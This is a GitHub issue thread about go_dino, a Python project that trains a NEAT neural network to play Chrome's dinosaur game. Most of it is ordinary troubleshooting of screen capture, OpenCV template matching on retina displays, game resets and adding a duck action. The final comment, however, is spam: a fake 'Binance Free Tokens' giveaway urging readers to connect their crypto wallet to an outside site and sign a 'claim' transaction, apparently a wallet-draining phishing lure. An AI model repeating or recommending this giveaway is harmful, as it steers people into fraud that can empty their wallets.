### ISSUE TITLE
Game doesn't continue playing after first generation

### ISSUE THREAD

**Issue by marianpavel** [pauloalves86/go_dino#3]
Hi,
I've found a few more problems.

1. When you run the program you need to jump 1-2 times at the start to recognize and take control.
2. After a generation is saved, the game doesn't reset and you need to handle manually the reset and do step 1.
3.  I am a little confused about this:

`    with open('winner.pkl', 'wb') as f:
        pickle.dump(winner, f)`

There is no winner.pkl file, files saved from neat are named like the below screenshot.

P.S. There was a problem of the reset_game method, ctr-r doesn't work on mac ( it doesn't do anything, however, I've been able to solve this problem by adding a space )

```
    @staticmethod
    def reset_game():
        pyautogui.hotkey('ctrl', 'r')
        pyautogui.press('space')
        time.sleep(4.)

```
<img width="199" alt="screen shot 2018-06-16 at 07 37 43" src="https://user-images.githubusercontent.com/8260460/41495796-421fab0a-7138-11e8-8e59-9141648226b6.png">

**Comment by marianpavel** [comment]
My bad, winner.pkl is saved after the N inside     `winner = pop.run(eval_fitness, 100)` but I do not see any progression of learning. I will try to look for the current problems

**Comment by marianpavel** [comment]
Ok, I have looked for problems and I found few things, don't know if there are real problems.

On the line: `return dict(monitor, height=lh, left=pt[0], top=pt[1] - lh + h, width=lw)`

The `pt[1] - lh + h` I think is incorrect, having the IDE on the right half of the screen and the chrome on the left half of the screen, transforming the image with: `Image.fromarray(image).show()` in the while loop is white. Changed with some constants and I found that 170 works great in my case.
<img width="1437" alt="screen shot 2018-06-17 at 11 26 43" src="https://user-images.githubusercontent.com/8260460/41506178-79735a04-7221-11e8-9deb-637f5e1b1746.png">

**Comment by pauloalves86** [comment]
This is a new problem but the root cause is the same, high DPI (retina display). To temporarily help you, replace _templates/dino_landscape.png_ with the following image, it may solve your problem.
<img width="600" alt="dino_landscape2" src="https://user-images.githubusercontent.com/532138/41538469-da0a3598-72e1-11e8-9641-e834fe354944.png">

**Comment by marianpavel** [comment]
What is the maximum score you could achieve? I got like 2000-2200 points. Also, the play_winner script it needs to be adjusted with the new Board class. I already did it in my local code.

I will let the program to run for N = 100 and after that, I am just curious if the winner file contains already trained the neural network.

**Comment by marianpavel** [comment]
@pauloalves86 I have a curiosity, on this sequence of code:

```
            if distance == last_distance or distance == 0:
                res = cv2.matchTemplate(image, self.gameover_template, cv2.TM_CCOEFF_NORMED)
                print(np.max(res))
                if np.max(res) > 0.5:
                    return score
```
Can you post an image of the result when the game is over ? My np.max(res) doesn't get above 0.5 and I think it's because of my hard coded image

**Comment by pauloalves86** [comment]
> What is the maximum score you could achieve?

There is no maximum, because the game is endless.


> I got like 2000-2200 points

That is great! Could you share it? This is a well trained neural network and because of latency, it's hard to go further. One of my bests NN achieved 5000-8000. I'm studying _PyQt_ to embed the game and improve performance, training faster and probably allowing the NN break records.


> I have a curiosity, on this sequence of code

`if distance == last_distance or distance == 0` means _the game seems stopped, you might be dead_
`distance == last_distance` means _you hit the front of the obstacle_
`distance == 0` means _you hit the back of the obstacle_ (ex.: you jumped too early and fall on the obstacle)
Inside the _if_ condition I check if the _gameover_template_ matches and _0.5_ is the threshold


> Can you post an image of the result when the game is over ? My np.max(res) doesn't get above 0.5 and I think it's because of my hard coded image

This might be the case, replace the _dino_gameover.png_ with the following image, and tell me if it works
<img width="34" alt="dino_gameover" src="https://user-images.githubusercontent.com/532138/41552747-136a4868-7306-11e8-9177-ba65329542f5.png">

**Comment by pauloalves86** [comment]
> I am just curious if the winner file contains already trained the neural network

Yes, but it does not means it's good. It means it's the best NN that was found.

**Comment by marianpavel** [comment]
Why do you use black & white on the button, does CV2 library work with different colors? Yesterday tried with the following image and it worked perfectly, now I don't know why it's not working anymore.
Can you share please some images of the game ? I wanna see some boundaries, the high DPI image above with the game doesn't work but if I see some real boundaries that you use I can try different resolutions/combinations
![dino_gameover_good](https://user-images.githubusercontent.com/8260460/41553366-3e9603c2-733a-11e8-92d6-f1867271b3cb.png)

**Comment by marianpavel** [comment]
Also: https://docs.opencv.org/2.4/modules/imgproc/doc/object_detection.html

templ – Searched template. It must be not greater than the source image and have the same data type.

**Comment by marianpavel** [comment]
I have successfully tested the repository on a computer and the OpenCV doesn't have any problems. 
I come now with a new question, is there a way how to make the network learn to duck? The program won't pass on the official google t-rex game because of the middle birds. On other copy of the games the trees are too close and it doesn't know that he can use down button to come faster on the ground. Best regards.

**Comment by pauloalves86** [comment]
> is there a way how to make the network learn to duck?

Yes, but it is more complex and will take more time training. I have not used this because the middle birds can be jumped, and I had trained a NN that was able to jump them.  I'll think a way to add it. You can create an issue for that if you want.
You'll have to change this code (trainer.py)

    class GetCommand(object):
        def __init__(self, net: nn.FeedForwardNetwork):
            self.net = net
    
        def __call__(self, distance: int, size: int, speed: int) -> str:
            value = self.net.activate([distance, size, speed])[0]
            if value >= 0.5:
                return 'up'
            return ''

and increase `num_outputs = 1` on _train_config.txt_

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
